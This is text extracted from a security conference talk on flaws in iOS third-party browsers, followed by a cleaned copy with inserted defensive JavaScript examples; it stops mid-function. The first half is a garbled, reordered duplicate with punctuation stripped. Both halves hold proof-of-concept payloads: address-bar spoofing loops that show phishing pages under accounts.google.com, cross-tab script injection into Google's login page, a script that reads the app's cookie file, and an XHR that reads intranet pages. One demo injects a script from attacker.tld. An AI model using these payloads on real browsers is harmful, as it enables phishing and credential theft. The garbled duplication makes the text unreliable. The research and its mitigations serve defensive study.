Address Bar Spoofing
Address Bar Spoofing Loading loop
Address Bar Spoofing
Loading loopbull HTTP request timeout in iOS browsers is usually
between 1 and 10 minutes
bull Address bar in Mobile Safari and many other iOS browsers is updated on navigation attempt even before an actual connection is made
bull Now we only need to find a target with filtered port 443
bull Or any filtered port because Mobile Safari shows only the hostname part of the URL
Address Bar Spoofing
Loading loop
bull documentwrite(Phishing page here) location = httpsaccountsgooglecom8443setInterval(function() location=httpsaccountsgooglecom8443 hellip)
Address Bar Spoofing
Address Bar Spoofing
Phishing page
Title bar
Address Bar Spoofing
lttitlegthttpswwwapplecomlttitlegt
Address bar tipsbull Display the URL that is currently loaded within
UIWebView not the one you think will be there
bull UIWebViewDelegate Update address bar on each event including webViewdidFailLoadWithError
bull Displaying SSL lock makes sense if there was an actual successful and valid SSL connection Spoofing https URL seems easy donrsquot make it worse by automatically adding SSL lock
bull iOS8 KVO-compliant WKWebViewURL property
Address Bar Spoofing
In this presentation
bull iOS Browsers UIWebView WKWebView
bull Address Bar Spoofing
bull Universal Cross-Site Scripting
bull Popups amp URL handling
bull SSL amp password managers
Mobile Browsers Security iOS
UXSS UniversalCross-Site Scripting
UXSS Universal Cross-Site Scripting
Universal Cross-Site Scripting
XSS enables attackers to inject client-side script into web pages viewed by other users
bypassing same-origin policy
In UXSS the attacker exploits vulnerability in the browser not in the website
(~ httpenwikipediaorgwikiCross-site_scripting)
Famous after PDF UXSS in 2007
UXSS Universal Cross-Site Scripting
Universal Cross-Site Scripting
bull CVE-2013-6893 UXSS in Mercury Browser for iOS
bull CVE-2013-7197 UXSS in YandexBrowser for iOS
bull CVE-2012-2899 UXSS in Google Chrome for iOS
bull hellip
UXSS Universal Cross-Site Scripting
Universal Cross-Site Scripting
UXSS Universal Cross-Site Scripting
CVE-2013-6893UXSS in Mercury Browser
UXSS Universal Cross-Site Scripting
CVE-2013-6893 Mercury UXSS
w = windowopen(lsquoaboutblankrsquo)
mbexec$(WINDOW_ID)[ commandwindowopen target1234 ldquourlaboutblank ]
Mathrandom()
UXSS Universal Cross-Site Scripting
[webView loadRequest hellip ldquoaboutblankrdquo hellip]
cross-frame forgery
CVE-2013-6893 Mercury UXSS
wdocumentwrite(lsquoHirsquo)
mbexec$(WINDOW_ID)[ ldquocommandwindowdocumentwrite target1234 ldquohtmlrdquoHi ]
UXSS Universal Cross-Site Scripting
[webView stringByEvaluatingJavaScriptFromString ldquodocumentwrite(lsquoHirsquo)rdquo]
CVE-2013-6893 Mercury UXSS
Mercury Browser for iOS does not implement same-origin policy restrictions for cross-tab calls Any at all
w = windowopen(lsquohttpsaccountsgooglecom) wdocumentwrite(lsquoltscript src=hellipgtltscriptgtrsquo) hellipand it just works in accountsgooglecom
UXSS Universal Cross-Site Scripting
UXSS Universal Cross-Site Scripting
CVE-2013-7197UXSS in YandexBrowser
UXSS Universal Cross-Site Scripting
CVE-2013-7197 Yandex UXSS
bull Same-origin check implemented on windowopen()
bull Not rechecked on windowdocumentwrite()
bull Redirect child window after windowopen()
UXSS
UXSS Universal Cross-Site Scripting
Bug Bounty-)
CVE-2012-2899UXSS in Google Chrome
UXSS Universal Cross-Site Scripting
CVE-2012-2899 Chrome UXSS
bull w = windowopen(locationhref)wdocumentwrite(lsquoHirsquo)
bull [webView loadHTMLStringldquoHirdquo baseURLhref]
UXSS Universal Cross-Site Scripting
CVE-2012-2899 Chrome UXSS
bull w = windowopen(lsquoaboutblankrsquo)wdocumentwrite(hellip)
bull aboutblank is kind of ldquono URLrdquo right
bull [webView loadHTMLStringldquohelliprdquo baseURLnil]
UXSS Universal Cross-Site Scripting
CVE-2012-2899 Chrome UXSS
bull For baseURL = nilUIWebView loads applewebdata origin Same as file - no same-origin policy access to any web origin and local files
UXSS Universal Cross-Site Scripting
CVE-2012-2899 Chrome UXSSbull w = windowopen(lsquoaboutblankrsquo)
wdocumentwrite( lsquoltscriptgtdocumentwrite(locationhref)ltscriptgtrsquo )
bull applewebdata origin
bull UXSS + local file access (application sandboxjailbreak)
UXSS Universal Cross-Site Scripting
Bug Bounty-)
Safe cross-tab documentwrite
bull w = windowopen(locationhref) wdocumentwrite(lsquoHirsquo)
bull [webView loadHTMLStringldquoHirdquo baseURL [NSURL hellipldquoaboutblankrdquo]
UXSS Universal Cross-Site Scripting
Safe cross-tab documentwrite
bull iOS8 use WKWebViewUIDelegate webViewcreateWebViewWithConfigurationforNavigationActionwindowFeatures
UXSS Universal Cross-Site Scripting
Other potential paths to applewebdata or file originbull baseURL
[NSURL URLWithStringldquohttpexamplecomrdquo] mdashgt nil
bull CFURLCreateWithString(kCFAllocatorDefault CFSTR(ldquohttpexamplecom) NULL) mdashgt NULL
bull Downloads opened directly from file
UXSS Universal Cross-Site Scripting
Content-Disposition attachmentbull displayed in the origin of hosting site (iOS lt 5)
CVE-2011-3426 Christian Matthies Yoshinori Oota
bull isolated attachment origin (iOS 5 +)
bull documentlocationhref
bull documentreferrer
bull w=windowopen(lsquohttpsrsquo+locationhostname) wdocumentwrite(lsquocustom SOP implementationrsquo)
UXSS Universal Cross-Site Scripting
Content-Typebull textplain
HTML (iOS lt 7) CVE-2013-5151 Ben Toews
bull applicationoctet-stream HTML
bull applicationother filenamehtml
UXSS Universal Cross-Site Scripting
JS without Same-Origin-Policy
ltscriptgta = documentlocationhrefsplit() if(a[0]===file) path = lsquofile+a[3]++a[4]++a[5]++a[6]+rsquo+a[7] path = path+LibraryCookiesCookiesbinarycookies x = new XMLHttpRequest() xopen(GET path false) xsend() alert(xresponseText) ltscriptgt
UXSS Universal Cross-Site Scripting
JS without Same-Origin-Policy
ltscriptgt x = new XMLHttpRequest() xopen(lsquoGET lsquohttpsyourintranet false) xsend() alert(xresponseText)ltscriptgt
UXSS Universal Cross-Site Scripting
ChallengeHijack password autofill
UXSS Universal Cross-Site Scripting
Opening local HTML files safely
bull Open as textplain
bull Content-Security-Policy header HTML5 sandbox
bull baseURL = aboutblank
bull iOS8 WKWebViewconfigurationpreferencesjavaScriptEnabled = false
UXSS Universal Cross-Site Scripting
In this presentation
bull iOS Browsers UIWebView WKWebView
bull Address Bar Spoofing
bull Universal Cross-Site Scripting
bull Popups amp URL handling
bull SSL amp password managers
Mobile Browsers Security iOS
Popups amp URL handling
Popups amp URL handling
bull Browsers rewriting href attributes for target=_blank can be usually tricked into believing navigation was initiated by user
bull ltiframe src=ldquogooglechromeexamplecomrdquogtltiframe src=ldquomercexamplecomrdquogtetc bypass all popup blockers anywayhellip
Popup blockers
Popups amp URL handling
Application(bolted-on)
Native (WebKit)
bull schemedownloadhttpssecuretldvictimdata schemedownloadhttpattackertldREADMEhtml
bull schemeadd-filterurl=
Bridge (internal)
URI schemes
Popups amp URL handling
Registered(external)
CFURL Null Pointer Dereferencebull Any CFURL function that gets NULL as an argument
will cause Null Pointer Dereference
bull Tested with percent encodinghttp http5 http5c etc
bull Example Opera Coast ltscriptgtdocumentlocation = lsquohttp5crsquoltscriptgt
Popups amp URL handling
Opera Coast
Program received signal EXC_BAD_ACCESS Could not access memory
Reason KERN_INVALID_ADDRESS at address 0x00000000
0x2f3e0d76 in CFURLCopyPath()
Popups amp URL handling
bull Special guest star Safari on OS X Mavericksbefore Security Update 2014-02 (CVE-2014-1315)
ltiframe src=ldquolets-try-format-stringpppphelliprdquogt
Popups amp URL handling
ltiframe src=ldquolets-try-format-stringpppphelliprdquogt
Popups amp URL handling
In this presentation
bull iOS Browsers UIWebView WKWebView
bull Address Bar Spoofing
bull Universal Cross-Site Scripting
bull Popups amp URL handling
bull SSL amp password managers
Mobile Browsers Security iOS
SSLbull By default invalid certificates for iOS UIWebView
https requests are rejected without user interaction
bull This can be changed (eg allowing a user to accept self-signed cert)
bull 14 of tested browsersself-signed SSL certificates are silently accepted
bull In some cases the validation is done for main domain only (eg Opera Coast lt 302)
SSL amp password managers
SSL amp password managers
Password managers
bull JavaScript with privileges of top frame mdashgt passwords not filled for subframes
bull Usually possible to force saving password for another domain (withwithout user interaction)
bull Password filling checks for domain but not always for URL scheme (https vs http)
SSL amp password managers
SSL amp password managers
Summary
bull UIWebViews should be replaced with iOS8 WKWebViews in browser applications
bull Most 3rd party iOS browsers are experimental or side projects built with less attention to detail
bull Mobile device management and other enterprise solutions often include a browser application Did you test it
Mobile Browsers Security iOS
Referencesbull httpsdeveloperapplecomlibraryiosdocumentation
AppleApplicationsReferenceSafariWebContent
bull httpsdeveloperapplecomlibraryiosdocumentationUIKitReferenceUIWebView_ClassReferenceReferencehtml
bull httpsdeveloperapplecomlibraryiosdocumentationUIKitReferenceUIWebViewDelegate_ProtocolReferenceReferencehtml
bull httpsdeveloperapplecomlibrarymacdocumentationcorefoundationReferenceCFURLRefReferencereferencehtml
bull httpsdeveloperapplecomlibraryprereleaseiosdocumentationWebKitReferenceWKWebView_Refindexhtml
Mobile Browsers Security iOS
Referencesbull httpscodegooglecompbrowsersec
bull httpwwww3orgTRCSP
bull httpwwwslidesharenetiphonepentestios-application-insecurity
bull httpslabsmwrinfosecuritycomblog20120416adventures-with-ios-uiwebviews
bull httpwwwshmoocomidn
bull httpblogchromiumorg200812security-in-depth-local-web-pageshtml
bull httpresearchmicrosoftcompubs73101guilogicsecuritypdf
bull httpgsstatcountercom
Mobile Browsers Security iOS
Referencesbull httpscodegooglecompchromiumissuesdetailid=146760
bull httpscodegooglecompchromiumissuesdetailid=147625
bull httpscodegooglecompchromiumissuesdetailid=324969
bull httpscodegooglecompchromiumissuesdetailid=326118
bull httpscodegooglecompchromiumissuesdetailid=326125
bull httpscodegooglecompchromiumissuesdetailid=348640
bull httpblogsoperacommobile201405opera-coast-updated-3-02
bull httpwwwf-securecomenweblabs_globalfsc-2014-4
Mobile Browsers Security iOS
References
bull httpbrowser-shreddersblogspotcom
bull httpsiosbrowsr-testscom
Mobile Browsers Security iOS
Questions
Mobile Browsers Security iOS
lukaszpilorzrunicpl pawelwylecialgmailcom
Twitter runicpl h0wlu
Thank you
Mobile Browsers Security iOS
In this presentation
bull iOS Browsers UIWebView WKWebView
bull Address Bar Spoofing
bull Universal Cross-Site Scripting
bull Popups amp URL handling
bull SSL amp password managers
Mobile Browsers Security iOS
iOS Browsers
iOS Browsers
iOS Browser == Mobile Safari
bull iOS App Store Review GuidelinesbdquoApps that browse the web must use the iOS WebKit framework and WebKit Javascriptrdquo
Introduction iOS Browsers
WebView-based Proxy-rendering
iOS Third-Party Browsers
gt 60 browsers in App Store
UIWebView amp WKWebView
UIWebView amp WKWebView
UIWebView amp WKWebView
UIWebView API
bull loadRequest
bull loadHTMLStringbaseURL
bull loadDataMIMETypetextEncodingNamebaseURL
bull goBackgoForwardstopLoadingreload
bull request (read-only)
UIWebView amp WKWebView
UIWebView APIbull stringByEvaluatingJavaScriptFromString
in the origin of currently loaded requestmainDocumentURL
No access to subframesfrom other domain than
the top document
httpexamplecom
httphiddentld
UIWebView amp WKWebView
JavaScript used to
implement browser features
and to override native functions to bridge them with Objective-C code
UIWebView amp WKWebView
UIWebViewDelegate
bull webViewshouldStartLoadWithRequestnavigationType
bull webViewDidStartLoad
bull webViewDidFinishLoad
bull webViewdidFailLoadWithError
UIWebView amp WKWebView
iOS8 beta WKWebViewbull configurationpreferences
bull configurationuserContentController
bull navigationDelegate
bull UIDelegate
bull URL (KVO)
bull hasOnlySecureContent (KVO)
UIWebView amp WKWebView
Bolted-on by the browsersbull Address bar
bull Multiple tabs
bull Downloads
bull Support for untrusted SSL certificates
bull Autocomplete amp password manager
bull hellip and many more features (safety ratings malware protection cloud integration hellip)
UIWebView amp WKWebView
Testing
bull Inspiration from Browser Security Handbook
bull Retesting previous Mobile Safari bugs
bull ldquoBlack-boxrdquo testing from web perspective review of JavaScript code a bit of reversing debugging
bull Cross-browser test caseshttpsiosbrowsr-testscom
Address Bar Spoofing

Two families: look-alike URLs (IDN homographs etc.) and URL tracking desynchronization, where the address bar and the displayed content stop agreeing.

URL tracking desynchronization
• Navigate to untracked content
• Initiate navigation, interrupt, overwrite content
• Failed navigation
• Loading loop
• Lots of other methods (race conditions, history, …)
• Most of them known for over 10 years (IE, Netscape)
Untracked Content
Replace the window content with content the address bar does not track. document.write and/or data: URIs are usually good candidates:
  w = window.open('https://accounts.google.com'); setTimeout(function(){ w.document.write(…) }, …);
• CVE-2013-5152: Mobile Safari Address Bar Spoofing, reported in iOS 5.1.1, fixed in iOS 7
Init & Interrupt
Initialise a window with the target URL, then replace it with phishing content before it loads:
  w = window.open('https://accounts.google.com'); w.document.write(…);
Optionally fall back to the native window.open (browsers override it with their own JavaScript):
  delete window.open; w = window.open('https://accounts.google.com'); w.document.write(…);
• CVE-2013-6895: Kaspersky Safe Browser
• CVE-2013-6898: F-Secure Safe Browser
• CVE-2013-6897: Dolphin Browser
• … and 45% of tested browsers
• Special guest star: Google Chrome for Android, CVE-2013-6642
Bug Bounty :-)
Failed Navigation
The incorrect URL often remains in the address bar after a navigation error:
• DNS NXDOMAIN, host not found (https://login.target.tld)
• TCP port closed (https://www.target.tld:448)
• SSL errors (https://target.tld)
• Display the phishing page, then redirect to the "incorrect" URL
• Mobile Safari before iOS 7: window.focus() or window.open().close() allowed suppressing the error alerts
Loading loop
• The HTTP request timeout in iOS browsers is usually between 1 and 10 minutes
• The address bar in Mobile Safari and many other iOS browsers is updated on the navigation attempt, even before an actual connection is made
• Now we only need to find a target with a filtered port 443
• Or any filtered port, because Mobile Safari shows only the hostname part of the URL
  document.write('Phishing page here'); location = 'https://accounts.google.com:8443'; setInterval(function(){ location = 'https://accounts.google.com:8443' }, …);
Title bar spoofing: the phishing page sets <title>https://www.apple.com</title>, so the title bar shows a URL of the attacker's choosing.
Address bar tips
• Display the URL that is currently loaded within the UIWebView, not the one you think will be there
• UIWebViewDelegate: update the address bar on each event, including webView:didFailLoadWithError:
• Displaying the SSL lock makes sense only if there was an actual successful and valid SSL connection. Spoofing an https URL seems easy; don't make it worse by automatically adding the SSL lock
• iOS 8: KVO-compliant WKWebView.URL property
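The tips above as an added worked example (this is not code from the talk or from any tested browser): a JavaScript model of an address-bar controller fed the callbacks a UIWebViewDelegate receives. The simulated web view, the event stream and the URLs are constructed for the simulation; the callback names follow UIWebViewDelegate, the event objects and controller names are this example's own.

```javascript
// Added example, not code from the talk or from any of the tested browsers:
// an address-bar controller driven by UIWebViewDelegate-style callbacks.
// The simulated web view, the event stream and the URLs are constructed here.
// The rule it demonstrates: show the URL the web view has actually loaded,
// refresh it on every callback (the failure one included), and light the
// padlock only after a finished, validated TLS load.

// Feed one constructed navigation history to a controller and return what
// the user would see at the end.
function simulate(events, controller) {
  // State the engine actually committed (stands in for request.mainDocumentURL
  // plus the outcome of the TLS handshake for that document).
  const webView = { mainDocumentURL: 'about:blank', tlsValid: false };
  const bar = { url: 'about:blank', lock: false };
  for (const ev of events) {
    switch (ev.type) {
      case 'start':   // shouldStartLoadWithRequest / webViewDidStartLoad
        controller.onStart(bar, webView, ev.url);
        break;
      case 'commit':  // response arrived, document replaced, webViewDidFinishLoad
        webView.mainDocumentURL = ev.url;
        webView.tlsValid = Boolean(ev.tlsValid);
        controller.onFinish(bar, webView);
        break;
      case 'fail':    // webView:didFailLoadWithError: - the old document is still shown
        controller.onFail(bar, webView, ev.url);
        break;
      default:
        throw new Error('unknown event ' + ev.type);
    }
  }
  return bar;
}

// The pattern found in many tested browsers: the bar follows the navigation
// attempt and the padlock follows the scheme of the attempted URL.
const naiveController = {
  onStart(bar, _webView, url) { bar.url = url; bar.lock = url.startsWith('https:'); },
  onFinish() {},
  onFail() {},   // shows an alert at most; the spoofed URL stays in the bar
};

// Hardened: bar and padlock are recomputed from the web view's own state on
// every callback, so a navigation that never connects, or that fails, cannot
// leave a foreign URL (or a padlock) behind.
const hardenedController = {
  sync(bar, webView) {
    bar.url = webView.mainDocumentURL;
    bar.lock = webView.tlsValid && webView.mainDocumentURL.startsWith('https:');
  },
  onStart(bar, webView) { this.sync(bar, webView); },   // a progress indicator, not a new URL
  onFinish(bar, webView) { this.sync(bar, webView); },
  onFail(bar, webView) { this.sync(bar, webView); },
};

// Constructed scenarios built from the techniques described above.
const SCENARIOS = {
  // Loading loop: phishing content is on screen, then the page navigates to a
  // filtered port and the request just hangs until the (long) timeout.
  loadingLoop: [
    { type: 'start', url: 'http://attacker.tld/' },
    { type: 'commit', url: 'http://attacker.tld/', tlsValid: false },
    { type: 'start', url: 'https://accounts.google.com:8443/' },
  ],
  // Failed navigation: NXDOMAIN after the phishing page has rendered.
  failedNavigation: [
    { type: 'start', url: 'http://attacker.tld/' },
    { type: 'commit', url: 'http://attacker.tld/', tlsValid: false },
    { type: 'start', url: 'https://login.target.tld/' },
    { type: 'fail', url: 'https://login.target.tld/' },
  ],
  // Genuine load: both controllers end up showing the same thing.
  genuine: [
    { type: 'start', url: 'https://www.apple.com/' },
    { type: 'commit', url: 'https://www.apple.com/', tlsValid: true },
  ],
};

function run(name, controller) {
  return simulate(SCENARIOS[name], controller);
}

if (typeof require !== 'undefined' && require.main === module) {
  for (const name of Object.keys(SCENARIOS)) {
    console.log(name, 'naive:', run(name, naiveController), 'hardened:', run(name, hardenedController));
  }
}
```

Running the file prints both controllers' results for each scenario. The hardened controller never consults the attempted URL at all: between the start and commit callbacks it has nothing new to show except a progress indicator, which is exactly what defeats the loading-loop and failed-navigation spoofs.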
UXSS: Universal Cross-Site Scripting

XSS enables attackers to inject client-side script into web pages viewed by other users, bypassing the same-origin policy. In UXSS the attacker exploits a vulnerability in the browser, not in the website (~ http://en.wikipedia.org/wiki/Cross-site_scripting). Famous after the PDF UXSS in 2007.
• CVE-2013-6893: UXSS in Mercury Browser for iOS
• CVE-2013-7197: UXSS in Yandex.Browser for iOS
• CVE-2012-2899: UXSS in Google Chrome for iOS
• …
CVE-2013-6893: UXSS in Mercury Browser

Page JavaScript:  w = window.open('about:blank')
Bridge message:   mb.exec$(WINDOW_ID)[ "command":"window.open", "target":1234, "url":"about:blank" ]   (target id generated with Math.random())
Native side:      [webView loadRequest: … "about:blank" …]
(cross-frame forgery)

Page JavaScript:  w.document.write('Hi')
Bridge message:   mb.exec$(WINDOW_ID)[ "command":"window.document.write", "target":1234, "html":"Hi" ]
Native side:      [webView stringByEvaluatingJavaScriptFromString:@"document.write('Hi')"]

Mercury Browser for iOS does not implement same-origin policy restrictions for cross-tab calls. Any at all.
  w = window.open('https://accounts.google.com'); w.document.write('<script src=…></script>');
… and it just works in accounts.google.com.
CVE-2013-7197: UXSS in Yandex.Browser
• Same-origin check implemented on window.open()
• Not rechecked on window.document.write()
• Redirect the child window after window.open() → UXSS
Bug Bounty :-)
CVE-2012-2899: UXSS in Google Chrome for iOS
• w = window.open(location.href); w.document.write('Hi')
  → [webView loadHTMLString:@"Hi" baseURL:href]
• w = window.open('about:blank'); w.document.write(…)
  about:blank is kind of "no URL", right?
  → [webView loadHTMLString:@"…" baseURL:nil]
• For baseURL = nil, UIWebView loads the content in the applewebdata:// origin. Same as file:// - no same-origin policy, access to any web origin and to local files
• w = window.open('about:blank'); w.document.write('<script>document.write(location.href)</script>')
  → shows the applewebdata:// origin
• UXSS + local file access (application sandbox / jailbreak)
Bug Bounty :-)
Safe cross-tab document.write
• w = window.open(location.href); w.document.write('Hi')
  → [webView loadHTMLString:@"Hi" baseURL:[NSURL … "about:blank"]]
• iOS 8: use the WKWebView UIDelegate method webView:createWebViewWithConfiguration:forNavigationAction:windowFeatures:
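Added example for the cross-tab document.write handlers discussed above (this is not the code of Mercury, Yandex.Browser or Chrome for iOS): the native-side check a bridged window.document.write needs before the HTML is evaluated in the target tab. The tab table, the command objects and their field names are constructed for this example and only loosely follow the mb.exec messages shown earlier.

```javascript
// Added example, not the code of Mercury, Yandex.Browser or Chrome for iOS: the
// handler for a bridged cross-tab document.write, the call that the three CVEs
// above turned into UXSS. Tab table and command objects are constructed here.

// Origin as the same-origin policy compares it: scheme, host and port.
// Anything that is not http(s) - file:, data:, a nil-baseURL applewebdata:
// document - is opaque and can never be "same origin" with a web page.
function originOf(href) {
  let u;
  try { u = new URL(href); } catch (e) { return null; }
  return (u.protocol === 'http:' || u.protocol === 'https:') ? u.origin : null;
}

// Effective origin of a tab at the moment of the check. A tab still at
// about:blank inherits the origin of the tab that opened it, resolved now and
// not at open time, because the opener may have navigated since.
function effectiveOrigin(tabs, id, depth = 0) {
  const tab = tabs.get(id);
  if (!tab || depth > 8) return null;
  if (tab.url === 'about:blank') {
    return tab.openerId === undefined ? null : effectiveOrigin(tabs, tab.openerId, depth + 1);
  }
  return originOf(tab.url);
}

// The Mercury pattern: evaluate whatever the page asked for, in whichever tab.
function handleWriteUnchecked(tabs, cmd) {
  const target = tabs.get(cmd.target);
  if (!target) return false;
  target.document = cmd.html;
  return true;
}

// Hardened: the check runs on every command, against the current URLs of both
// caller and target. Checking once at window.open() and trusting the handle
// afterwards (the Yandex pattern) fails as soon as the child navigates.
function handleWrite(tabs, cmd) {
  const target = tabs.get(cmd.target);
  if (!target) return false;
  const callerOrigin = effectiveOrigin(tabs, cmd.caller);
  const targetOrigin = effectiveOrigin(tabs, cmd.target);
  if (callerOrigin === null || targetOrigin === null) return false;
  if (callerOrigin !== targetOrigin) return false;
  target.document = cmd.html;
  return true;
}

// Constructed tab table: tab 1 is the attacker page; 2, 3 and 4 were all opened
// by it through the bridged window.open.
function makeTabs() {
  return new Map([
    [1, { url: 'http://attacker.tld/', document: '<phishing page>' }],
    [2, { url: 'about:blank', openerId: 1, document: '' }],
    [3, { url: 'https://accounts.google.com/', openerId: 1, document: '<login form>' }],
    [4, { url: 'applewebdata://00000000-0000-0000-0000-000000000000/', openerId: 1, document: '' }],
  ]);
}

// Runs the CVE scenarios and the legitimate one side by side.
function demo() {
  const tabs = makeTabs();
  const injected = '<script src="http://attacker.tld/x.js"></script>';
  const results = {
    ownPopup: handleWrite(tabs, { caller: 1, target: 2, html: 'Hi' }),
    foreignTabUnchecked: handleWriteUnchecked(makeTabs(), { caller: 1, target: 3, html: injected }),
    foreignTab: handleWrite(tabs, { caller: 1, target: 3, html: injected }),
    opaqueTab: handleWrite(tabs, { caller: 1, target: 4, html: injected }),
  };
  // Yandex pattern: the popup was same-origin when opened, then got redirected.
  tabs.get(2).url = 'https://accounts.google.com/';
  results.redirectedPopup = handleWrite(tabs, { caller: 1, target: 2, html: injected });
  results.loginFormIntact = tabs.get(3).document === '<login form>';
  return results;
}
```

The opaque case matters as much as the foreign-tab case: a document loaded with a nil baseURL, a file:// download or a data: URI has no web origin, so it must be refused on both sides of the comparison rather than accidentally matched as "same" because two null values compare equal.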
Other potential paths to the applewebdata:// or file:// origin
• baseURL: [NSURL URLWithString:@"http://example.com…"] → nil (returned for any string NSURL cannot parse)
• CFURLCreateWithString(kCFAllocatorDefault, CFSTR("http://example.com…"), NULL) → NULL for the same input
• Downloads opened directly from file://
Content-Disposition: attachment
• displayed in the origin of the hosting site (iOS < 5): CVE-2011-3426, Christian Matthies, Yoshinori Oota
• isolated attachment origin (iOS 5+), but document.location.href and document.referrer still carry the hosting site's URL, which a browser's custom SOP implementation may trust:
  w = window.open('https://' + location.hostname); w.document.write('custom SOP implementation')
Content-Type
• text/plain rendered as HTML (iOS < 7): CVE-2013-5151, Ben Toews
• application/octet-stream rendered as HTML
• application/other with filename=….html rendered as HTML
JS without Same-Origin Policy

Reading the app's cookie jar from a file:// document (a[3]..a[7] rebuild the app container path, e.g. /private/var/mobile/Applications/<UUID>):
  <script>
  a = document.location.href.split('/');
  if (a[0] === 'file:') {
    path = 'file:///' + a[3] + '/' + a[4] + '/' + a[5] + '/' + a[6] + '/' + a[7];
    path = path + '/Library/Cookies/Cookies.binarycookies';
    x = new XMLHttpRequest(); x.open('GET', path, false); x.send();
    alert(x.responseText);
  }
  </script>

Reading any web origin, including the intranet:
  <script>
  x = new XMLHttpRequest(); x.open('GET', 'https://yourintranet', false); x.send();
  alert(x.responseText);
  </script>
Challenge: hijack password autofill

Opening local HTML files safely
• Open as text/plain
• Content-Security-Policy header, HTML5 sandbox
• baseURL = about:blank
• iOS 8: WKWebView configuration.preferences.javaScriptEnabled = false
Popups & URL handling

Popup blockers
• Browsers rewriting href attributes for target=_blank can usually be tricked into believing the navigation was initiated by the user
• <iframe src="googlechrome://example.com">, <iframe src="merc://example.com"> etc. bypass all popup blockers anyway…

URI schemes
• Native (WebKit)
• Application (bolted-on), e.g.
  scheme://download/https://secure.tld/victim/data, scheme://download/http://attacker.tld/README.html
  scheme://add-filter?url=
• Bridge (internal)
• Registered (external)
CFURL Null Pointer Dereference
• Any CFURL function that gets NULL as an argument will cause a NULL pointer dereference
• Tested with percent encoding: http://%, http://%5, http://%5c etc.
• Example, Opera Coast: <script>document.location = 'http://%5c'</script>

Opera Coast:
  Program received signal EXC_BAD_ACCESS, Could not access memory.
  Reason: KERN_INVALID_ADDRESS at address: 0x00000000
  0x2f3e0d76 in CFURLCopyPath ()
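Added example (not Opera Coast's or any other browser's code) covering both the nil-baseURL path to the applewebdata:// origin listed under "Other potential paths" and the CFURL NULL dereference above: a guard the browser's JavaScript layer can run before a string is handed to NSURL URLWithString: or CFURLCreateWithString, whose nil/NULL results are what the native side then fails to check. The inputs are constructed and the helper names are this example's own; on the native side the equivalent check is simply testing the returned NSURL/CFURLRef for nil before using it.

```javascript
// Added example, not Opera Coast's or any browser's code: validate a URL in
// the JavaScript layer before it crosses the bridge. Native URL constructors
// return nil/NULL for strings they cannot parse; an unchecked nil becomes an
// applewebdata: origin (as baseURL) or a NULL dereference (as a CFURL argument).
// All inputs below are constructed.

// A '%' must introduce exactly two hex digits (RFC 3986); 'http://%' and
// 'http://%5' are the malformed inputs from the slide.
const BAD_PERCENT_ESCAPE = /%(?![0-9A-Fa-f]{2})/;
// Conservative host alphabet after parsing: DNS labels or a bracketed IPv6
// literal. 'http://%5c' decodes to a backslash host and is rejected here even
// if a URL parser were to accept it.
const DNS_HOST = /^[A-Za-z0-9](?:[A-Za-z0-9-]*[A-Za-z0-9])?(?:\.[A-Za-z0-9](?:[A-Za-z0-9-]*[A-Za-z0-9])?)*\.?$/;
const IPV6_HOST = /^\[[0-9A-Fa-f:.]+\]$/;
const WEB_SCHEMES = new Set(['http:', 'https:']);

// Returns the normalized URL string to pass to native, or null if the input
// must not be handed over (the native side would get nil/NULL back, or worse).
function toNativeURL(input) {
  if (typeof input !== 'string' || input.length === 0 || input.length > 8192) return null;
  if (/[\u0000-\u001f\u007f]/.test(input)) return null;        // control characters
  if (BAD_PERCENT_ESCAPE.test(input)) return null;
  let u;
  try { u = new URL(input); } catch (e) { return null; }       // the parser's own failures
  if (!WEB_SCHEMES.has(u.protocol)) return null;               // no file:, javascript:, data:, custom schemes
  if (!DNS_HOST.test(u.hostname) && !IPV6_HOST.test(u.hostname)) return null;
  if (u.username !== '' || u.password !== '') return null;     // userinfo hides the real host from the user
  return u.href;
}

// Batch form: pairs each candidate with what may cross the bridge (or null).
function filterNativeURLs(inputs) {
  return inputs.map(s => [s, toNativeURL(s)]);
}
```

The parser is used for normalization only; the decision to reject is made by the explicit checks, so the outcome does not depend on which edge cases a given URL parser happens to tolerate. Custom schemes registered by the app (the bridge and download schemes above) need their own, separate allow-list rather than a pass through this function.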
• Special guest star: Safari on OS X Mavericks before Security Update 2014-002 (CVE-2014-1315)
  <iframe src="lets-try-format-string:%p%p%p%p…">
SSL & password managers

SSL
• By default, invalid certificates for iOS UIWebView https requests are rejected without user interaction
• This can be changed (e.g. allowing a user to accept a self-signed cert)
• 14% of tested browsers: self-signed SSL certificates are silently accepted
• In some cases the validation is done for the main domain only (e.g. Opera Coast < 3.02)
Password managers
• JavaScript runs with the privileges of the top frame → passwords are not filled for subframes
• Usually possible to force saving a password for another domain (with or without user interaction)
• Password filling checks the domain, but not always the URL scheme (https vs http)
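Added example (not any tested browser's password manager) for the three points above: the save and fill decisions of a bolted-on password manager, both keyed by the full origin of the top-level document. The credential store, the page URLs and the function names are constructed for this example.

```javascript
// Added example, not any tested browser's password manager: where to file a
// captured password and which entries to offer a page. Store and URLs are
// constructed. Both decisions use the full origin (scheme, host, port) of the
// top-level document, never the host name alone and never a frame.

// Origin of a web document, or null for anything opaque (file:, data:, about:).
function webOriginOf(href) {
  let u;
  try { u = new URL(href); } catch (e) { return null; }
  return (u.protocol === 'http:' || u.protocol === 'https:') ? u.origin : null;
}

// Saving: key the entry by the origin of the document the user typed into,
// not by the form's action URL or any value the page supplies. A form on
// attacker.tld posting to accounts.google.com must not create a google entry.
function saveCredential(store, documentURL, username, password, isTopFrame) {
  const origin = webOriginOf(documentURL);
  if (!isTopFrame || origin === null) return false;
  const existing = store.find(e => e.origin === origin && e.username === username);
  if (existing) existing.password = password; else store.push({ origin, username, password });
  return true;
}

// Filling: exact origin match. A password saved on https://accounts.google.com
// is not offered to http://accounts.google.com (a spoofed bar, a downgraded or
// intercepted connection) nor to https://accounts.google.com:8443.
function credentialsFor(store, pageURL, isTopFrame) {
  if (!isTopFrame) return [];          // bridge JS only has top-frame privileges anyway
  const origin = webOriginOf(pageURL);
  if (origin === null) return [];
  return store.filter(e => e.origin === origin).map(e => e.username);
}

// The weak variant seen in some tested browsers: host name only.
function credentialsForHostOnly(store, pageURL) {
  let host;
  try { host = new URL(pageURL).hostname; } catch (e) { return []; }
  return store.filter(e => new URL(e.origin).hostname === host).map(e => e.username);
}

// Constructed walk-through: a genuine save, an attacker's form that posts to
// Google, a save attempted from a subframe, then fills under several conditions.
function demo() {
  const store = [];
  saveCredential(store, 'https://accounts.google.com/ServiceLogin', 'alice', 'hunter2', true);
  // attacker page containing <form action="https://accounts.google.com/…">
  const attackerSave = saveCredential(store, 'http://attacker.tld/fake-login', 'alice', 'owned', true);
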